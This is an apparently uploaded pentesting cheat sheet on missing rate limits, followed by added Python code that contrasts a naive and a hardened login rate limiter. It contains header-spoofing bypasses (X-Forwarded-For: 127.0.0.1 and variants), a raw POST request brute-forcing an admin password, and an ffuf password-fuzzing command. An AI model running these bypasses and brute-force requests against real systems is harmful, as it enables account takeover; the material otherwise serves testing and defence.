Rate Limit

The document outlines various areas where there is no rate limit implemented, such as login pages and password resets, which could lead to account takeovers. It also details methods to bypass rate limits by manipulating HTTP headers. Additionally, it includes an example of a POST request to exploit these vulnerabilities.

Uploaded by francismizo77
Rate limit

1- No rate limit on login page
2- No rate limit on internal password
3- No rate limit on sending reset password link
4- No rate limit on OTP or 2FA => account takeover
5- No rate limit on contact us page
6- No rate limit on comments
7- No rate limit on reports of comments
8- No rate limit on port 22 (SSH)

------------
Bypass rate limit by adding headers:
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Origination-IP: 127.0.0.1 or 0.0.0.0
X-Fowarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
------------------------------------------
POST /login.php HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Origination-IP: 127.0.0.1
X-Fowarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

username=admin&password=$fuzz$
-------------------------------------------
429 => 403: bypass rate limit

ffuf -u https://example.com -w wordlist.txt --data "username=admin&password=FUZZ" -H "X-Forwarded-For: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1"
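The header-based bypass above only works when the server keys its rate limit on a client-supplied header. Added example (not from the original note): a login rate limiter in Python keyed on a naive IP lookup next to a hardened one that honours X-Forwarded-For only when the TCP peer is a trusted reverse proxy. The proxy address 10.0.0.5, the limit of 5 attempts per minute and the request data are constructed for this example.

```python
import time
from collections import defaultdict, deque

# Constructed for this example: only this reverse proxy may set forwarding headers.
TRUSTED_PROXIES = {"10.0.0.5"}

def client_ip_naive(headers, remote_addr):
    """Weak: trusts X-Forwarded-For from any peer, so each request can choose its own key."""
    xff = headers.get("x-forwarded-for")
    return xff.split(",")[0].strip() if xff else remote_addr

def client_ip_hardened(headers, remote_addr):
    """Hardened: forwarding headers count only when the TCP peer is a trusted proxy."""
    if remote_addr not in TRUSTED_PROXIES:
        return remote_addr                      # spoofed X-Forwarded-For etc. ignored
    hops = [h.strip() for h in headers.get("x-forwarded-for", "").split(",") if h.strip()]
    return hops[-1] if hops else remote_addr    # rightmost hop is what the proxy itself saw

class LoginRateLimiter:
    """Sliding-window limiter: at most `limit` attempts per `window` seconds per key."""
    def __init__(self, limit=5, window=60.0, ip_func=client_ip_hardened):
        self.limit, self.window, self.ip_func = limit, window, ip_func
        self.attempts = defaultdict(deque)

    def allow(self, headers, remote_addr, now=None):
        now = time.monotonic() if now is None else now
        key = self.ip_func({k.lower(): v for k, v in headers.items()}, remote_addr)
        q = self.attempts[key]
        while q and now - q[0] >= self.window:  # drop attempts outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False                        # caller answers 429 Too Many Requests
        q.append(now)
        return True

def simulate(ip_func, attempts=20):
    """Count how many of `attempts` requests from one peer get through when each
    request carries a different spoofed X-Forwarded-For (constructed traffic)."""
    limiter = LoginRateLimiter(limit=5, ip_func=ip_func)
    allowed = 0
    for i in range(attempts):
        spoofed = {"X-Forwarded-For": f"127.0.0.{i}", "X-Remote-IP": "127.0.0.1"}
        if limiter.allow(spoofed, remote_addr="203.0.113.7", now=float(i)):
            allowed += 1
    return allowed

if __name__ == "__main__":
    print("naive limiter let through:", simulate(client_ip_naive))        # 20
    print("hardened limiter let through:", simulate(client_ip_hardened))  # 5
```

The same check applies to X-Remote-IP, X-Remote-Addr and similar headers: none of them should reach the rate-limit key unless the peer that set them is trusted.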